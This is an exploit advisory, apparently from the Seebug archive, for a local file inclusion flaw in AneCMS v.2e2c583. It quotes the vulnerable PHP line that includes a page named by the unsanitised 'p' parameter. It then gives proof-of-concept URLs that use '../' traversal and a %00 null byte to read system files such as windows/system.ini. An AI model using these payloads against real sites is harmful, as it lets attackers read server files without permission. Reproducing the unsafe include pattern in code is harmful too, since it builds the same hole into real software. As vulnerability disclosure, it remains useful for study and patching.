# Exploit Title: AneCMS v.2e2c583 LFI exploit # Date: 03.04.2012# Author: I2sec-PJH # Software Link: https://github.com/AneGroup/AneCMS # Version: v.2e2c583 ----------------------------------------------------- -Description vulnerabilities have been discovered in the index page. -source of index.php 1. if(isset($_GET['p'])) 2. include './pages/'.$_GET['p'].'.php'; 3. else 4. include './pages/dash.php'; -PoC http://localhost/acp/index.php?p=../../../../windows/system.ini%00 http://localhost/acp/index.php?p=../../../../[localfile]%00
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论